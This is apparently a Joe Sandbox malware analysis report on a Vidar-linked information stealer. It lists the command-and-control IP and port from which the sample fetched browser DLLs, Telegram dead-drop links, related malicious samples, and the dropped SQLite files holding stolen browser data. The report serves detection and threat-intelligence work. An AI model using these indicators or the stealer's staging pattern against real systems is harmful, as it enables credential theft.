                https://195.201.251.214:9000/freebl3.dllffsetsRegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/mozglue.dllaRegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://t.me/g067nJtRegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/freebl3.dllRegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/softokn3.dllRegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/nss3.dllURegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://t.me/g067nry1neMozilla/5.056bDgH9sMQ.exe, 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/mozglue.dlloRegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/freebl3.dllatchRegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/msvcp140.dlletRegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000gRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/nss3.dlloRegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.icoBGDAAK.2.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/msvcp140.dllRegAsm.exe, 00000002.00000002.3052745059.0000000001135000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/:9000RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:900030cleRegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BGDAAK.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://upx.sf.netAmcache.hve.5.drfalse
                • URL Reputation: safe
                		unknown
                https://195.201.251.214:9000/freebl3.dllmRegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3055858373.00000000196AC000.00000004.00000020.00020000.00000000.sdmp, BAKFCB.2.drfalse
                • URL Reputation: safe
                		unknown
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.ecosia.org/newtab/BGDAAK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://195.201.251.214:9000/freebl3.dlluRegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/nzCRegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/vcruntime140.dllerRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/softokn3.dllllRegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/vcruntime140.dllRegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=BGDAAK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://195.201.251.214:9000/msvcp140.dlleRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/softokn3.dlleRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/vcruntime140.dllDRegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/nesRegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/freebl3.dllgeRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/ORegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://t.me/pjmRegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/softokn3.dllVRegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214/RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBAKFCB.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BGDAAK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://195.201.251.214:9000/sqlt.dllRegAsm.exe, 00000002.00000002.3052745059.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000MicrosoftRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                195.201.251.214
                		unknownGermany
                		24940HETZNER-ASDEfalse
                149.154.167.99
                		t.meUnited Kingdom
                		62041TELEGRAMRUtrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1465067
                Start date and time:2024-07-01 09:11:12 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 1s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:56bDgH9sMQ.exe
                renamed because original name is a hash value
                Original Sample Name:f88272ea7674d3acedd8adcf7643c598.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@6/14@5/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 72
                • Number of non-executed functions: 236
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 87.248.205.0, 20.42.65.92
                • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, arc.msn.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:12:36API Interceptor1x Sleep call for process: RegAsm.exe modified
                03:12:44API Interceptor1x Sleep call for process: WerFault.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                195.201.251.214vjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                  2E7ZdlxkOL.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                    S8co1ACRdn.exeGet hashmaliciousCryptOne, VidarBrowse
                      M9dfZzH3qn.exeGet hashmaliciousCryptOne, VidarBrowse
                        5IRIk4f1PO.exeGet hashmaliciousCryptOne, VidarBrowse
                          1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                            1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                              149.154.167.99http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                              • telegram.org/?setln=pl
                              http://makkko.kz/Get hashmaliciousUnknownBrowse
                              • telegram.org/
                              http://telegram.dogGet hashmaliciousUnknownBrowse
                              • telegram.dog/
                              LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                              • t.me/cinoshibot
                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                              • t.me/cinoshibot
                              vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                              • t.me/cinoshibot
                              RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                              • t.me/cinoshibot
                              KeyboardRGB.exeGet hashmaliciousUnknownBrowse
                              • t.me/cinoshibot
                              file.exeGet hashmaliciousCinoshi StealerBrowse
                              • t.me/cinoshibot

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              t.mevjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                              • 149.154.167.99
                              2E7ZdlxkOL.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                              • 149.154.167.99
                              S8co1ACRdn.exeGet hashmaliciousCryptOne, VidarBrowse
                              • 149.154.167.99
                              M9dfZzH3qn.exeGet hashmaliciousCryptOne, VidarBrowse
                              • 149.154.167.99
                              5IRIk4f1PO.exeGet hashmaliciousCryptOne, VidarBrowse
                              • 149.154.167.99
                              1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                              • 149.154.167.99
                              1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                              • 149.154.167.99
                              project.exeGet hashmaliciousRedLineBrowse
                              • 149.154.167.99
                              WR0fuHnEVW.exeGet hashmaliciousVidarBrowse
                              • 149.154.167.99
                              BRWgvKaqbg.exeGet hashmaliciousPureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                              • 149.154.167.99
                              windowsupdatebg.s.llnwi.nethttps://s54rew.pages.dev/Get hashmaliciousUnknownBrowse
                              • 87.248.202.1
                              http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                              • 87.248.204.0
                              http://pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                              • 87.248.204.0
                              https://nsfgrs03.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                              • 87.248.202.1
                              http://pub-ab9522f1c3a9451fb5bf68fa1c6bcfca.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                              • 87.248.204.0
                              https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36Get hashmaliciousHTMLPhisherBrowse
                              • 178.79.238.128
                              Invoice.jarGet hashmaliciousSTRRATBrowse
                              • 87.248.205.0
                              https://t4ha7.shop/Get hashmaliciousUnknownBrowse
                              • 87.248.205.0
                              https://mars.773670658.workers.dev/Get hashmaliciousUnknownBrowse
                              • 87.248.204.0
                              http://pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.htmlGet hashmaliciousUnknownBrowse
                              • 87.248.202.1

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              TELEGRAMRUhttps://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              vjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                              • 149.154.167.99
                              hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                              • 149.154.167.220
                              Evo Resou_nls..scr.exeGet hashmaliciousAsyncRATBrowse
                              • 149.154.167.220
                              Wave.exeGet hashmaliciousXWormBrowse
                              • 149.154.167.220
                              https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              RFQ 52165 Materiale vario OENAGROUP.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 149.154.167.220
                              New Order Ergun Makina Hirdavat Tic #102718.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                              • 149.154.167.220
                              2E7ZdlxkOL.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                              • 149.154.167.99
                              S8co1ACRdn.exeGet hashmaliciousCryptOne, VidarBrowse
                              • 149.154.167.99
                              HETZNER-ASDENI0Y4iB1ON.exeGet hashmaliciousRedLineBrowse
                              • 5.161.190.139
                              https://www.teamviewer.com/en-in/download/windows/Get hashmaliciousUnknownBrowse
                              • 144.76.236.241
                              https://he110ca11he1lpn0wwb112.pages.dev/Get hashmaliciousTechSupportScamBrowse
                              • 195.201.57.90
                              https://serviceca11he1pn0waa12.pages.dev/Get hashmaliciousTechSupportScamBrowse
                              • 195.201.57.90
                              https://u.to/NuS5IAGet hashmaliciousUnknownBrowse
                              • 94.130.141.49
                              botx.x86.elfGet hashmaliciousMiraiBrowse
                              • 135.181.82.247
                              vjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                              • 195.201.251.214
                              _$phantom-SCV.cmdGet hashmaliciousUnknownBrowse
                              • 144.76.71.93
                              Evo Resou_nls..scr.exeGet hashmaliciousAsyncRATBrowse
                              • 49.12.202.237
                              https://he110ca11he1lpn0wwb112.pages.dev/Get hashmaliciousTechSupportScamBrowse
                              • 195.201.57.90

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              37f463bf4616ecd445d4a1937da06e19vjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                              • 149.154.167.99
                              factura546532.msi_factura546532.msi_78870.msiGet hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              FIX_0x80070643_(Need_reboot).regGet hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              SecuriteInfo.com.Trojan.Packed2.47113.10794.31741.dllGet hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              SecuriteInfo.com.Trojan.Packed2.47113.12395.16994.dllGet hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              SecuriteInfo.com.Trojan.Packed2.47113.10794.31741.dllGet hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              SecuriteInfo.com.Trojan.Packed2.47113.12395.16994.dllGet hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              SecuriteInfo.com.Adware.Downware.20552.29919.24444.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              SecuriteInfo.com.Trojan.Packed2.47113.2909.11487.dllGet hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              SecuriteInfo.com.Trojan.Packed2.47113.15675.13139.dllGet hashmaliciousUnknownBrowse
                              • 149.154.167.99

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dllvjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                2E7ZdlxkOL.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                                  S8co1ACRdn.exeGet hashmaliciousCryptOne, VidarBrowse
                                    M9dfZzH3qn.exeGet hashmaliciousCryptOne, VidarBrowse
                                      5IRIk4f1PO.exeGet hashmaliciousCryptOne, VidarBrowse
                                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                                          1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                            WR0fuHnEVW.exeGet hashmaliciousVidarBrowse
                                              BRWgvKaqbg.exeGet hashmaliciousPureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                                                vidar2406.exeGet hashmaliciousVidarBrowse

                                                  Created / dropped Files

                                                  C:\ProgramData\CFIEBKEHCAKF\BAKFCB

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                  Category:dropped
                                                  Size (bytes):159744
                                                  Entropy (8bit):0.7873599747470391
                                                  Encrypted:false
                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\CFIEBKEHCAKF\BGDAAK

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.1358696453229276
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\CFIEBKEHCAKF\HDGDHC

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):40960
                                                  Entropy (8bit):0.8553638852307782
                                                  Encrypted:false
                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\CFIEBKEHCAKF\HJDBKJ

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                  Category:dropped
                                                  Size (bytes):28672
                                                  Entropy (8bit):2.5793180405395284
                                                  Encrypted:false
                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\CFIEBKEHCAKF\IECGHJ

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):0.47147045728725767
                                                  Encrypted:false
                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\CFIEBKEHCAKF\JECAEH

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                  Category:modified
                                                  Size (bytes):114688
                                                  Entropy (8bit):0.9746603542602881
                                                  Encrypted:false
                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_56bDgH9sMQ.exe_6753fc4336f189f5fb3908672f6549aff5ec85_db4f562b_8bf834f7-d476-4e10-bc4d-96a40156ebb2\Report.wer

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.7141782392681953
                                                  Encrypted:false
                                                  SSDEEP:96:OGVjgFTB2DsZhq+1yDfRgBQXIDcQvc6QcEVcw3cE/f+HbHg/PB6HeaOy1H3a9/ZV:OUsv2DfN0BU/4jGGzuiFQZ24IO83Y
                                                  MD5:4A7E275B6A47B23578B7379B47342F3F
                                                  SHA1:9BB7758BF2F4BB42579836FED5BCC160F46406FA
                                                  SHA-256:52E5C4F490650EB7585B55E01AE9EC285E1D990D81F35D6EE2B4B7644523716A
                                                  SHA-512:32A2382E08951B2C4073D11C63C14B341CE4C4643A6051BC9F0721CDA823D9B6E71AAED84BC7E187F62C54CFF0E849ED42A09B5760C685147389A4756DC322B3
